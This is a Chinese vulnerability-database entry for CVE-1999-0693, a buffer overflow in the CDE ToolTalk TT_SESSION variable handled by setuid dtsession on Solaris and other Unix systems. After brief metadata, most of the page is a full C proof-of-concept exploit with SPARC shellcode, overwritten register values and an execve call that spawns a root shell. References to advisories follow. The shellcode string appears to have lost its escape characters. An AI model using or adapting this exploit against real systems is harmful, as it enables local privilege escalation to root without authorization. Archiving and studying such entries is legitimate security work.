多个供应商CDETT Session缓冲区溢出漏洞

多个供应商CDETT Session缓冲区溢出漏洞

漏洞ID 1105536 漏洞类型 缓冲区溢出
发布时间 1999-09-13 更新时间 2005-05-02
图片[1]-多个供应商CDETT Session缓冲区溢出漏洞-安全小百科CVE编号 CVE-1999-0693
图片[2]-多个供应商CDETT Session缓冲区溢出漏洞-安全小百科CNNVD-ID CNNVD-200003-007
漏洞平台 Linux CVSS评分 7.2
|漏洞来源
https://www.exploit-db.com/exploits/19501
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200003-007
|漏洞详情
ToolTalk共享目录的TT_SESSION环境变量存在缓冲区溢出漏洞。本地用户利用此漏洞可以提升根特权。
|漏洞EXP
/*
source: http://www.securityfocus.com/bid/641/info

TRU64/DIGITAL UNIX 4.0 d/f,AIX <= 4.3.2,Common Desktop Environment <= 2.1 20, IRIX <= 6.5.14,Solaris <= 7.0,SunOS <= 4.1.4 TTSession Buffer Overflow Vulnerability 

The libtt.so shared library under certain versions of CDE handles a user defined variable titled TT_SESSION. The code which handles this variable does not place a restriction on its size. At least one of the CDE programs which rely on this variable do not have sufficient bounds checking in place for this variable. This can result in a buffer overflow. The program in question is dtsession.

Due to the fact that dtsession is running setuid root and does not remove the root privilege (at least as tested on Solaris), the overflow can lead to local root compromise. 
*/

/*
 * ovsession.c
 * Job de Haas
 * (C) ITSX BV 1999
 *
 * Some proof of concept code (== really ugly, barely working) at exploiting
 * an overflow in libtt.so when parsing the TT_SESSION string.
 * Only tested on a Solaris 2.6 sun4c sparc, with and without patch 105802-07
 * based loosly on code by horizon <[email protected]>
 * Somehow the overflow is very sensitive to caching of the stack. To see that
 * it really does work, run it in a debugger and set a break point in tt_open()
 * when that is reached, set a breakpoint in sscanf and continue. When that is
 * reached continue again and it will either crash or execute a shell.
 */

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/systeminfo.h>
#include <unistd.h>
#include <string.h>

#define BUF_LEN 280

char exploit[] =
"2203310015202204027221323100152203310017
22024010320432773702242401133252277377
332432773742203314012022040622132310015
2203310015202204051221323100153203277370
222432401022443240420220407322132310015
2323310015232331001523233100152323310015
2323310015232331001523233100152323310015
17737737734423233100155714215115657153163150QQQ";

#if patched
#define got     0xef6d2be0
#else
#define got     0xef6d2f84
#endif

main()
{
    char *argp[6], *envp[20];
    char buf[3072];
    char *ttsess;
    char *display;
    u_long *longp;
    char data[512];
    char padding[64];
    char platform[256];
    int pad=31;
    int i;

    memset(buf,0,3072);
    memset(buf,'a',BUF_LEN);

    longp = (unsigned long *)(buf+BUF_LEN);

    /* %l0 - %l7 */
    *longp++ = 0xdeadcafe;
    *longp++ = 0xdeadcafe;
    *longp++ = 0xdeadcafe;
    *longp++ = 0xdeadcafe;
    *longp++ = 0xdeadcafe;
    *longp++ = 0xdeadcafe;
    *longp++ = 0xdeadcafe;
    *longp++ = 0xdeadcafe;

    /* %i0 - %i7 */
    *longp++ = 0xdeadcafe;
    *longp++ = 0xefffff94;      /* make sure %i1 can be used */
    *longp++ = 0xdeadcafe;
    *longp++ = got;             /* also used before we get to the exploit */
    *longp++ = 0xdeadcafe;
    *longp++ = 0xdeadcafe;
    *longp++ = 0xefffffb0;      /* frame with some necessary values */
    *longp++ = 0xeffffdd0;      /* return into the exploit code */


    longp=(unsigned long *)data;

    *longp++=0xdeadbeef;
    *longp++=0xdeadbeef;
    *longp++=0xdeadbeef;
    *longp++=0xdeadbeef;
    *longp++=0xdeadbeef;
    *longp++=0xffffffff;
    *longp++=0xdeadbeef;
    *longp++=0;
    *longp++=0xefffffb4;
    *longp++=0x01;
    *longp++=0xef6dc154;
    *longp++=0xeffffd26;
    *longp++=0x00;

    argp[0] = strdup("/usr/dt/bin/dtsession");
    argp[1] = NULL;

    if (!getenv("DISPLAY")) {
        printf("forgot to set DISPLAYn");
        exit(1);
    }

    sysinfo(SI_PLATFORM,platform,256);
    pad+=20-strlen(platform)-strlen(argp[0]);

    for (i=0;i<pad;padding[i++]='C')
        padding[i]=0;

    /* create an enviroment size independent of the size of $DISPLAY */
    display = malloc( 8 + strlen(getenv("DISPLAY")) + 1);
    strcpy(display,"DISPLAY=");
    strcat(display+8,getenv("DISPLAY"));
    envp[0] = display;
    envp[1] = malloc(60);
    memset(envp[1], 0, 60);
    memset(envp[1], 'a', 60 - strlen(envp[0]));
    strncpy(envp[1],"W=",2);

    /* put the exploit code in the env space (easy to locate) */
    envp[2] = strdup(exploit);

    /* create the overflow string */
    ttsess = strdup("TT_SESSION=01 18176 1289637086 1 0 1000 %s 4");
    envp[3] = malloc( strlen(ttsess) + strlen(buf));
    sprintf(envp[3],ttsess,buf);

    /* make it easier to debug, probably smarter ways to do this */
    envp[4] = strdup("LD_BIND_NOW=1   ");

    /* put some data in the environment to keep the code running after the
       overflow, but before the return pointer is used. includes NULL ptrs */
    envp[5]=(data);
    envp[6]="";
    envp[7]="";
    envp[8]="";
    envp[9]=&(data[32]);
    envp[10]="";
    envp[11]="";
    envp[12]=&(data[39]);
    envp[13]="";
    envp[14]="";
    envp[15]="10";
    envp[16]=padding;
    envp[17]=NULL;

    execve("/usr/dt/bin/dtsession",argp,envp);

}
|参考资料
resource:
hyperlink:http://sunsolve.sun.com/pub-cgi/retrieve.pl?doctype=coll&doc;=secbull/192
resource:
hyperlink:http://www.securityfocus.com/bid/641
resource:
hyperlink:http://www1.itrc.hp.com/service/cki/docDisplay.do?docId=HPSBUX9909-103
resource:
hyperlink:https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A4374

相关推荐: SmartMax MailMax缓冲区溢出漏洞

SmartMax MailMax缓冲区溢出漏洞 漏洞ID 1202792 漏洞类型 缓冲区溢出 发布时间 2003-06-09 更新时间 2003-06-09 CVE编号 CVE-2003-0319 CNNVD-ID CNNVD-200306-021 漏洞平台…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享